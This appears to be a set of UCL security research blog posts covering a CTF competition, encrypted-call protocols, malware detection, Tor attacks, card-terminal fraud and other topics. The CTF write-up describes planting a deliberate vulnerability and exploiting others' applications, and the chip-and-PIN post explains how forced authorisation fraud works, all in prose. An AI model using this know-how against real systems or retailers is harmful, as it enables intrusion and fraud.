Our contributions to the UK Distributed Ledger Technology report

The UK Government Office for Science, has published its report on “Distributed ledger technology: beyond block chain” to which UCL’s Sarah Meiklejohn, Angela Sasse and myself (George Danezis) contributed parts of the security and privacy material. The review, looks largely at economic, innovation and social aspects of these technologies. Our part discusses potential threats to ledgers, as well as opportunities to build robust security systems using ledgers (Certificate Transparency & CONIKS), and overcome privacy challenges, including a mention of the z.cash technology.

You can listen to the podcast interview Sarah gave on the report’s use cases, recommendations, but also more broadly future research directions for distributed ledgers, such as better privacy protection.

In terms of recommendation, I personally welcome the call for the Government Digital Services, and other innovation bodies to building capacity around distributed ledger technologies. The call for more research for efficient and secure ledgers (and the specific mention of cryptography research) is also a good idea, and an obvious need. When it comes to the specific security and privacy recommendation, it simply calls for standards to be established and followed. Sadly this is mildly vague: a standards based approach to designing secure and privacy-friendly systems has not led to major successes. Instead openness in the design, a clear focus on key end-to-end security properties, and the involvement of a wide community of experts might be more productive (and less susceptible to subversion).

The report is well timed: our paper on “Centrally Banked Crypto-Currencies” will be presented in February at a leading security conference, NDSS 2016, by Sarah Meiklejohn, largely inspired by the research agenda published by the Bank of England. It provides some answers to the problems of scalability and eco-friendliness of current proof-of-work based ledger design.

First UCL team competes in the International Capture The Flag competition

Team THOR, UCL’s Capture the Flag (CTF) team, took part in its first CTF competition – the UCSB iCTF, on the 4th December 2015. The team comprised of students from the computer science department – Tom Sigler, Chris Park, Jason Papapanagiotakis, Azeem Ilyas, Salman Khalifa, Luke Roberts, Haran Anand, Alexis Enston, Austin Chamberlain, Jaromir Latal, Enrico Mariconti, and Razvan Ragazan. Through Gianluca Stringhini’s hacking seminars and our own experience, we were eager to test our ability to identify, exploit and patch application vulnerabilities.

The THOR team in action

The CTF competition style was “attack and defence” with a slight twist – each participating team had to write a vulnerable application. We were provided with a Linux virtual machine containing all of the applications which we hosted on a locally running server. This server connected to the organiser’s network over a virtual private network (VPN). During the competition, the organiser regularly polled our server to make sure each of the applications were running and whether or not they still had a security vulnerability. We were scored on 3 criteria: how many applications were up and running (and whether or not the vulnerabilities had been patched), how many flags we had managed to obtain through exploiting vulnerabilities and how close our submitted application was to the median in terms of being vulnerable, but not too vulnerable.

The application had to be “balanced” in terms of security i.e. if it was too easy or too difficult to exploit then points would be deducted. Fortunately, the organisers provided sample applications which gave us an excellent starting point. One of the sample applications was a “notes” service written in PHP – it enabled a note (which represented the flag) to be saved against a flag ID with a password. The note could be retrieved by supplying the flag ID and password, but a vulnerable CGI script enabled the note to be retrieved without a password! We customised this application by removing the CGI script (this vulnerability was very easy to identify and exploit) and changing the note insertion code so that a specially crafted token (a hex-encoded Epoch timestamp) was added next to each flag ID, password and note entry. A vulnerability was then introduced whereby note retrieval would be a two-step process – first the flag ID and password would be specified, then if the password was valid, the token would be retrieved and used in combination with the flag ID to retrieve the note. The first step of the process could be bypassed by brute-forcing the token and avoiding the password verification phase. We kept our fingers crossed that this would be exploitable by the other teams, but not too easily!

Attacking involved analysing the various applications written by the other teams for vulnerabilities. As soon as a vulnerability had been identified, we had to write some code to perform the exploit and retrieve the flag for that application. The flag served as evidence that we had successfully exploited an application. To maximise attack points, we had to run the exploit against each team’s server and submit the flags to the organiser every few minutes. Defence involved ensuring that the applications were up and running, keeping the server online and ideally patching any vulnerabilities identified in our copies of the applications.

The competition started at 5pm – we were online with our server and applications shortly afterwards. Fueled by adrenaline, caffeine, and immense enthusiasm, we chose several applications to focus our initial efforts on and got cracking!

A good portion of the applications were web applications written in PHP. This was great news as we had focused on web application vulnerabilities during the hacking seminars. We also identified applications written in Python, Java, C and Bash. Some of them were imaginative and amusing – a dating service for monkeys written in PHP, a pizza order and delivery service written in PHP and a command-line dungeon game written in C.

We managed to exploit and patch an ATM machine application through a SQL injection vulnerability (the same security vulnerability involved in the recent TalkTalk and vTech data breaches). One of the Python applications used a “pickle” function which was exploited to enable arbitrary code execution. A second Python application was vulnerable to a path-traversal bug which enabled flags to be retrieved from other user’s directories. We also were on the cusp of exploiting a buffer-overflow vulnerability in a C application, but ran out of time.

The competition ran for 8 hours and at the end, THOR ranked 14th out of 35. Given that it was THOR’s first time participating in a CTF, being the only team to represent the UK and being up against experienced teams, we felt that it was a great result! We had a huge amount of fun taking part and working as a team, so much so, that we are planning to take part in more CTF competitions in the future! Many thanks again to Gianluca, the organisers and all who participated. Go THOR!

Insecure by design: protocols for encrypted phone calls

The MIKEY-SAKKE protocol is being promoted by the UK government as a better way to secure phone calls. The reality is that MIKEY-SAKKE is designed to offer minimal security while allowing undetectable mass surveillance, through the introduction a backdoor based around mandatory key-escrow. This weakness has implications which go further than just the security of phone calls.

The current state of security for phone calls leaves a lot to be desired. Land-line calls are almost entirely unencrypted, and cellphone calls are also unencrypted except for the radio link between the handset and the phone network. While the latest cryptography standards for cellphones (3G and 4G) are reasonably strong it is possible to force a phone to fall back to older standards with easy-to-break cryptography, if any. The vast majority of phones will not reveal to their user whether such an attack is under way.

The only reason that eavesdropping on land-line calls is not commonplace is that getting access to the closed phone networks is not as easy compared to the more open Internet, and cellphone cryptography designers relied on the equipment necessary to intercept the radio link being only affordable by well-funded government intelligence agencies, and not by criminals or for corporate espionage. That might have been true in the past but it certainly no longer the case with the necessary equipment now available for $1,500. Governments, companies and individuals are increasingly looking for better security.

A second driver for better phone call encryption is the convergence of Internet and phone networks. The LTE (Long-Term Evolution) 4G cellphone standard – under development by the 3rd Generation Partnership Project (3GPP) – carries voice calls over IP packets, and desktop phones in companies are increasingly carrying voice over IP (VoIP) too. Because voice calls may travel over the Internet, whatever security was offered by the closed phone networks is gone and so other security mechanisms are needed.

Like Internet data encryption, voice encryption can broadly be categorised as either link encryption, where each intermediary may encrypt data before passing it onto the next, or end-to-end encryption, where communications are encrypted such that only the legitimate end-points can have access to the unencrypted communication. End-to-end encryption is preferable for security because it avoids intermediaries being able to eavesdrop on communications and gives the end-points assurance that communications will indeed be encrypted all the way to their other communication partner.

Current cellphone encryption standards are link encryption: the phone encrypts calls between it and the phone network using cryptographic keys stored on the Subscriber Identity Module (SIM). Within the phone network, encryption may also be present but the network provider still has access to unencrypted data, so even ignoring the vulnerability to fall-back attacks on the radio link, the network providers and their suppliers are weak points that are tempting for attackers to compromise. Recent examples of such attacks include the compromise of the phone networks of Vodafone in Greece (2004) and Belgacom in Belgium (2012), and the SIM card supplier Gemalto in France (2010). The identity of the Vodafone Greece hacker remains unknown (though the NSA is suspected) but the attacks against Belgacom and Gemalto were carried out by the UK signals intelligence agency – GCHQ – and only publicly revealed from the Snowden leaks, so it is quite possible there are others attacks which remain hidden.

Email is typically only secured by link encryption, if at all, with HTTPS encrypting access to most webmail and Transport Layer Security (TLS) sometimes encrypting other communication protocols that carry email (SMTP, IMAP and POP). Again, the fact that intermediaries have access to plaintext creates a vulnerability, as demonstrated by the 2009 hack of Google’s Gmail likely originating from China. End-to-end email encryption is possible using the OpenPGP or S/MIME protocols but their use is not common, primarily due to their poor usability, which in turn is at least partially a result of having to stay compatible with older insecure email standards.

In contrast, instant messaging applications had more opportunity to start with a clean-slate (because there is no expectation of compatibility among different networks) and so this is where much innovation in terms of end-to-end security has taken place. Secure voice communication however has had less attention than instant messaging so in the remainder of the article we shall examine what should be expected of a secure voice communication system, and in particular see how one of the latest and up-coming protocols, MIKEY-SAKKE, which comes with UK government backing, meets these criteria.

MIKEY-SAKKE and Secure Chorus

MIKEY-SAKKE is the security protocol behind the Secure Chorus voice (and also video) encryption standard, commissioned and designed by GCHQ through their information security arm, CESG. GCHQ have announced that they will only certify voice encryption products through their Commercial Product Assurance (CPA) security evaluation scheme if the product implements MIKEY-SAKKE and Secure Chorus. As a result, MIKEY-SAKKE has a monopoly over the vast majority of classified UK government voice communication and so companies developing secure voice communication systems must implement it in order to gain access to this market. GCHQ can also set requirements of what products are used in the public sector and as well as for companies operating critical national infrastructure.

UK government standards are also influential in guiding purchase decisions outside of government and we are already seeing MIKEY-SAKKE marketed commercially as “government-grade security” and capitalising on their approval for use in the UK government. For this reason, and also because GCHQ have provided implementers a free open source library to make it easier and cheaper to deploy Secure Chorus, we can expect wide use MIKEY-SAKKE in industry and possibly among the public. It is therefore important to consider whether MIKEY-SAKKE is appropriate for wide-scale use. For the reasons outlined in the remainder of this article, the answer is no – MIKEY-SAKKE is designed to offer minimal security while allowing undetectable mass surveillance though key-escrow, not to provide effective security.

Continue reading Insecure by design: protocols for encrypted phone calls

ACE-CSR opening event 2015/16: talks on malware, location privacy and wiretap law

The opening event for the UCL Academic Centre of Excellence for Cyber Security Research in the 2015–2016 academic term featured three speakers: Earl Barr, whose work on approximating program equivalence has won several ACM distinguished paper awards; Mirco Musolesi from the Department of Geography, whose background includes a degree in computer science and an interest in analysing myriad types of data while protecting privacy; and Susan Landau, a professor at Worcester Polytechnic Institute and a visiting professor at UCL and an expert on cyber security policy whose books include Privacy On the Line: the Politics of Wiretapping and Encryption (with Whitfield Diffie) and Surveillance or Security? The Risks Posed by New Wiretapping Technologies.

Detecting malware and IP theft through program similarity

Earl Barr is a member of the software systems engineering group and the Centre for Research on Evolution, Search, and Testing. His talk outlined his work using program similarity to determine whether two arbitrary programs have the same behaviour in two areas relevant to cyber security: malware and intellectual property theft in binaries (that is, code reused in violation of its licence).

Barr began by outlining his work on detecting malware, comparing the problem to that facing airport security personnel trying to find a terrorist among millions of passengers. The work begins with profiling: collect two zoos, and then ask if the program under consideration is more likely to belong to the benign zoo or the malware zoo.

Rather than study the structure of the binary, Barr works by viewing the program as strings of 0s and 1s, which may not coincide with the program’s instructions, and using information theory to create a measure of dissimilarity, the normalised compression distance (NCD). The NCD serves as an approximation of the Kolmogorov Complexity, a mathematical measure of the complexity of the shortest description of an object, which is then normalised using a compression algorithm that ignores the details of the instruction set architecture for which the binary is written.

Using these techniques to analyse a malware zoo collected from sources such as Virus Watch, Barr was able to achieve a 95.7% accuracy rate. He believes that although this technique isn’t suitable for contemporary desktop anti-virus software, it opens a new front in the malware detection arms race. Still, Barr is aware that malware writers will rapidly develop countermeasures and his group is already investigating counter-countermeasures.

Malware writers have three avenues for blocking detection: injecting new content that looks benign; encryption; and obfuscation. Adding new content threatens the malware’s viability: raising the NCD by 50% requires doubling the size of the malware. Encryption can be used against the malware writer: applying a language model across the program reveals a distinctive saw-toothed pattern of regions with low surprise and low entropy alternating with regions of high surprise and high entropy (that is, regions with ciphertext). Obfuscation is still under study: the group is using three obfuscation engines available for Java and applying them repeatedly to Java malware. Measuring the NCD after each application shows that after 100 iterations the NCD approaches 1 (that is, the two items being compared are dissimilar), but that two of the three engines make errors after 200 applications. Unfortunately for malware writers, this technique also causes the program to grow in size. The cost of obfuscation to malware writers may therefore be greater than that imposed upon white hats.

Continue reading ACE-CSR opening event 2015/16: talks on malware, location privacy and wiretap law

Nicolas Courtois – Algebraic cryptanalysis is not the best way to break something, but sometimes it is the only option

Nicolas Courtois, a mathematician and senior lecturer in computer science at UCL, working with Daniel Hulme and Theodosis Mourouzis, has won the 2012 best paper award from the International Academy, Research, and Industry Association for their work on using SAT solvers to study various problems in algebra and circuit optimization. The research was funded by the European Commission under the FP7 project number 242497, “Resilient Infrastructure and Building Security (RIBS)” and by the UK Technology Strategy Board under project 9626-58525. The paper, Multiplicative Complexity and Solving Generalized Brent Equations with SAT Solvers, was presented at Computation Tools 2012, the third International Conference on Computational Logics, Algebras, Programming, Tools, and Benchmarking, held in Nice, France in July.

https://www.youtube.com/watch?v=Lfen7ZOIkYw

SAT (short for “satisfiability”) solvers are algorithms used to analyse logical problems composed of multiple statements such as “A is true OR not-B is true or C is true” for the purpose of determining whether the whole system can be true – that is, whether all the statements it’s composed of can be satisfied. SAT solvers also are used to determine how to assign the variables to make the set of statements true. In 2007, Bard and Courtois realised they could be used to test the security of cryptographic functions and measure their complexity, and today they are important tools in cryptanalysis; they have already been used for a long time in other applications such as verifying hardware and software. In this particular paper, Courtois, Hulme, and Mourouzis focused on optimising S-boxes for industrial block ciphers; the paper reports the results of applying their methodology to the PRESENT and GOST block ciphers. Reducing the complexity and hardware cost of these ciphers is particularly important to build so-called secure implementations of cryptography. These are particularly costly because they need to protect against additional threats such as side-channel attacks, in which the attacker exploits additional information leaked from the physical system – for example, by using an oscilloscope to observe a smart card’s  behaviour.

“It’s more a discovery than an invention,” says Courtois. “One of the amazing things SAT solvers can do is give you proof that something is not true.” The semiconductor industry provides one application of the work in this paper: these techniques promise to provide a way to test whether a circuit has been built with the greatest possible efficiency by proving that the chip design uses the smallest possible number of logic gates.

“You’ll get optimal designs and be able to prove they cannot be done better,” he says.

Classical cryptanalysis proceeds by finding approximations to the way a cipher works. Many successful academic attacks have been mounted using such techniques, but they rely on having a relatively large amount of data available for study. That works for large archives of stored data – such as, for example, the communications stored and kept by the Allies after World War II for later cryptanalysis. But in many real-world applications, it is more common to have only very small amounts of data.

“The more realistic scenario is that you’ll just have one or a few messages,” says Courtois. Bluetooth, for example, encrypts only 1,500 bits with a single key. “Most attacks are useless because they won’t work with this quantity of data.” Algebraic cryptanalysis, which he explained in New Frontier in Symmetric Cryptanalysis, an invited talk at Indocrypt 2008, by contrast, is one of the few techniques that can be hoped to work in such difficult situations.

Continue reading Nicolas Courtois – Algebraic cryptanalysis is not the best way to break something, but sometimes it is the only option

How Tor’s privacy was (momentarily) broken, and the questions it raises

Just how secure is Tor, one of the most widely used internet privacy tools? Court documents released from the Silk Road 2.0 trial suggest that a “university-based research institute” provided information that broke Tor’s privacy protections, helping identify the operator of the illicit online marketplace.

Silk Road and its successor Silk Road 2.0 were run as a Tor hidden service, an anonymised website accessible only over the Tor network which protects the identity of those running the site and those using it. The same technology is used to protect the privacy of visitors to other websites including journalists reporting on mafia activity, search engines and social networks, so the security of Tor is of critical importance to many.

How Tor’s privacy shield works

Almost 97% of Tor traffic is from those using Tor to anonymise their use of standard websites outside the network. To do so a path is created through the Tor network via three computers (nodes) selected at random: a first node entering the network, a middle node (or nodes), and a final node from which the communication exits the Tor network and passes to the destination website. The first node knows the user’s address, the last node knows the site being accessed, but no node knows both.

The remaining 3% of Tor traffic is to hidden services. These websites use “.onion” addresses stored in a hidden service directory. The user first requests information on how to contact the hidden service website, then both the user and the website make the three-hop path through the Tor network to a rendezvous point which joins the two connections and allows both parties to communicate.

In both cases, if a malicious operator simultaneously controls both the first and last nodes to the Tor network then it is possible to link the incoming and outgoing traffic and potentially identify the user. To prevent this, the Tor network is designed from the outset to have sufficient diversity in terms of who runs nodes and where they are located – and the way that nodes are selected will avoid choosing closely related nodes, so as to reduce the likelihood of a user’s privacy being compromised.

How Tor works
How Tor works (source: EFF)

This type of design is known as distributed trust: compromising any single computer should not be enough to break the security the system offers (although compromising a large proportion of the network is still a problem). Distributed trust systems protect not only the users, but also the operators; because the operators cannot break the users’ anonymity – they do not have the “keys” themselves – they are less likely to be targeted by attackers.

Unpeeling the onion skin

With about 2m daily users Tor is by far the most widely used privacy system and is considered one of the most secure, so research that demonstrates the existence of a vulnerability is important. Most research examines how to increase the likelihood of an attacker controlling both the first and last node in a connection, or how to link incoming traffic to outgoing.

When the 2014 programme for the annual BlackHat conference was announced, it included a talk by a team of researchers from CERT, a Carnegie Mellon University research institute, claiming to have found a means to compromise Tor. But the talk was cancelled and, unusually, the researchers did not give advance notice of the vulnerability to the Tor Project in order for them to examine and fix it where necessary.

This decision was particularly strange given that CERT is worldwide coordinator for ensuring software vendors are notified of vulnerabilities in their products so they can fix them before criminals can exploit them. However, the CERT researchers gave enough hints that Tor developers were able to investigate what had happened. When they examined the network they found someone was indeed attacking Tor users using a technique that matched CERT’s description.

The multiple node attack

The attack turned on a means to tamper with a user’s traffic as they looked up the .onion address in the hidden service directory, or in the hidden service’s traffic as it uploaded the information to the directory.

Continue reading How Tor’s privacy was (momentarily) broken, and the questions it raises

New EU Innovative Training Network project “Privacy & Us”

Last week, “Privacy & Us” — an Innovative Training Network (ITN) project funded by the EU’s Marie Skłodowska-Curie actions — held its kick-off meeting in Munich. Hosted in the nice and modern Wisschenschafts Zentrum campus by Uniscon, one of the project partners, principal investigators from seven different countries set out the plan for the next 48 months.

Privacy & Us really stands for “Privacy and Usability” and aims to conduct privacy research and, over the next 3 years, train thirteen Early Stage Researchers (ESRs) — i.e., PhD students — to be able to reason, design, and develop innovative solutions to privacy research challenges, not only from a technical point of view but also from the “human side”.

The project involves nine “beneficiaries”: Karlstads Universitet (Sweden), Goethe Universitaet Frankfurt (Germany), Tel Aviv University (Israel), Unabhängiges Landeszentrum für Datenschutz (Germany), Uniscon (Germany), University College London (UK), USECON (Austria), VASCO Innovation Center (UK), and Wirtschaft Universitat Wien (Austria), as well as seven partner organizations: the Austrian Data Protection Authority (Austria), Preslmayr Rechtsanwälte OG (Austria), Friedrich-Alexander University Erlangen (Germany), University of Bonn (Germany), the Bavarian Data Protection Authority (Germany), EveryWare Technologies (Italy), and Sentor MSS AB (Sweden).

The people behind Privacy & Us project at the kick-off meeting in Munich, December 2015
The people behind Privacy & Us project at the kick-off meeting in Munich, December 2015

The Innovative Training Networks are interdisciplinary and multidisciplinary in nature and promote, by design, a collaborative approach to research training. Funding is extremely competitive, with acceptance rate as low as 6%, and quite generous for the ESRs who often enjoy higher than usual salaries (exact numbers depend on the hosting country), plus 600 EUR/month mobility allowance and 500 EUR/month family allowance.

The students will start in August 2016 and will be trained to face both current and future challenges in the area of privacy and usability, spending a minimum of six months in secondment to another partner organization, and participating in several training and development activities.

Three studentships will be hosted at UCL,  under the supervision of Dr Emiliano De Cristofaro, Prof. Angela Sasse, Prof. Ann Blandford, and Dr Steven Murdoch. Specifically, one project will investigate how to securely and efficiently store genomic data, design and implementing privacy-preserving genomic testing, as well as support user-centered design of secure personal genomic applications. The second project will aim to better understand and support individuals’ decision-making around healthcare data disclosure, weighing up personal and societal costs and benefits of disclosure, and the third (with the VASCO Innovation Centre) will explore techniques for privacy-preserving authentication, namely, extending these to develop and evaluate innovative solutions for secure and usable authentication that respects user privacy.

Continue reading New EU Innovative Training Network project “Privacy & Us”

Forced authorisation chip and PIN scam hitting high-end retailers

Chip and PIN was designed to prevent fraud, but it also created a new opportunity for criminals that is taking retailers by surprise. Known as “forced authorisation”, committing the fraud requires no special equipment and when it works, it works big: in one transaction a jewellers store lost £20,500. This type of fraud is already a problem in the UK, and now that US retailers have made it through the first Black Friday since the Chip and PIN deadline, criminals there will be looking into what new fraud techniques are available.

The fraud works when the retailer has a one-piece Chip and PIN terminal that’s passed between the customer and retailer during the course of the transaction. This type of terminal is common, particularly in smaller shops and restaurants. They’re a cheaper option compared to terminals with a separate PIN pad (at least until a fraud happens).

The way forced authorisation fraud works is that the retailer sets up the terminal for a transaction by inserting the customer’s card and entering the amount, then hands the terminal over to the customer so they can type in the PIN. But the criminal has used a stolen or counterfeit card, and due to the high value of the transaction the terminal performs a “referral” — asking the retailer to call the bank to perform additional checks such as the customer answering a security question. If the security checks pass, the bank will give the retailer an authorisation code to enter into the terminal.

The problem is that when the terminal asks for these security checks, it’s still in the hands of the criminal, and it’s the criminal that follows the steps that the retailer should have. Since there’s no phone conversation with the bank, the criminal doesn’t know the correct authorisation code. But what surprises retailers is that the criminal can type in anything at this stage and the transaction will go through. The criminal might also be able to bypass other security features, for example they could override the checking of the PIN by following the steps the retailer would if the customer has forgotten the PIN.

By the time the terminal is passed back to the retailer, it looks like the transaction was completed successfully. The receipt will differ only very subtly from that of a normal transaction, if at all. The criminal walks off with the goods and it’s only at the end of the day that the authorisation code is checked by the bank. By that time, the criminal is long gone. Because some of the security checks the bank asked for weren’t completed, the retailer doesn’t get the money.

Continue reading Forced authorisation chip and PIN scam hitting high-end retailers

Program obfuscation

I had the pleasure of visiting the Simons Institute for the Theory of Computing at UC Berkeley over the Summer. One of the main themes of the programme was obfuscation.

Recently there has been a lot of exciting research on developing cryptographic techniques for program obfuscation. Obfuscation is of course not a new thing, you may already be familiar with the obfuscated C contest. But the hope underlying this research effort is to replace ad hoc obfuscation, which may or may not be possible to reverse engineer, with general techniques that can be applied to obfuscate any program and that satisfy a rigorous definition of what it means for a program to be obfuscated.

Even defining what it means for a program to be obfuscated is not trivial. Ideally, we would like an obfuscator to be a compiler that turns any computer program into a virtual black-box. By a virtual black-box we mean that the obfuscated program should preserve functionality while not leaking any other information about the original code, i.e., it should have the same input-output behaviour as the original program and you should not be able to learn anything beyond what you could learn by executing the original program. Unfortunately it turns out that this is too ambitious a goal: there are special programs, which are impossible to virtual black-box obfuscate.

Instead cryptographers have been working towards developing something called indistinguishability obfuscation. Here the goal is that given two functionally equivalent programs P1 and P2 of the same size and an obfuscation of one of them O(Pi), it should not be possible to tell which one has been obfuscated. Interestingly, even though this is a weaker notion than virtual black-box obfuscation it has already found many applications in the construction of cryptographic schemes. Furthermore, it has been proved that indistinguishability obfuscation is the best possible obfuscation in the sense that any information leaked by an obfuscated program is also leaked by any other program computing the same functionality.

So, when will you see obfuscation algorithms that you can use to obfuscate your code? Well, current obfuscation algorithms have horrible efficiency and are far from practical applicability so there is still a lot of research to be done on improving them. Moreover, current obfuscation proposals are based on something called graded encoding schemes. At the moment, there is a tug of war going on between cryptographers proposing graded encoding schemes and cryptanalysts breaking them. Breaking graded encoding schemes does not necessarily break the obfuscation algorithms building on them but it is fair to say that right now the situation is a mess. Which from a researcher’s perspective makes the field very exciting since there is still a lot to discover!

If you want to learn more about obfuscation I recommend the watching some of the excellent talks from the programme.

Scaling Tor hidden services

Tor hidden services offer several security advantages over normal websites:

  • both the client requesting the webpage and the server returning it can be anonymous;
  • websites’ domain names (.onion addresses) are linked to their public key so are hard to impersonate; and
  • there is mandatory encryption from the client to the server.

However, Tor hidden services as originally implemented did not take full advantage of parallel processing, whether from a single multi-core computer or from load-balancing over multiple computers. Therefore once a single hidden service has hit the limit of vertical scaling (getting faster CPUs) there is not the option of horizontal scaling (adding more CPUs and more computers). There are also bottle-necks in the Tor networks, such as the 3–10 introduction points that help to negotiate the connection between the hidden service and the rendezvous point that actually carries the traffic.

For my MSc Information Security project at UCL, supervised by Steven Murdoch with the assistance of Alec Muffett and other Security Infrastructure engineers at Facebook in London, I explored possible techniques for improving the horizontal scalability of Tor hidden services. More precisely, I was looking at possible load balancing techniques to offer better performance and resiliency against hardware/network failures. The focus of the research was aimed at popular non-anonymous hidden services, where the anonymity of the service provider was not required; an example of this could be Facebook’s .onion address.

One approach I explored was to simply run multiple hidden service instances using the same private key (and hence the same .onion address). Each hidden service periodically uploads its own descriptor, which describes the available introduction points, to six hidden service directories on a distributed hash table. The hidden service instance chosen by the client depends on which hidden service instance most recently uploaded its descriptor. In theory this approach allows an arbitrary number of hidden service instances, where each periodically uploads its own descriptors, overwriting those of others.

This approach can work for popular hidden services because, with the large number of clients, some will be using the descriptor most recently uploaded, while others will have cached older versions and continue to use them. However my experiments showed that the distribution of the clients over the hidden service instances set up in this way is highly non-uniform.

I therefore ran experiments on a private Tor network using the Shadow network simulator running multiple hidden service instances, and measuring the load distribution over time. The experiments were devised such that the instances uploaded their descriptors simultaneously, which resulted in different hidden service directories receiving different descriptors. As a result, clients connecting to a hidden service would be balanced more uniformly over the available instances.

Continue reading Scaling Tor hidden services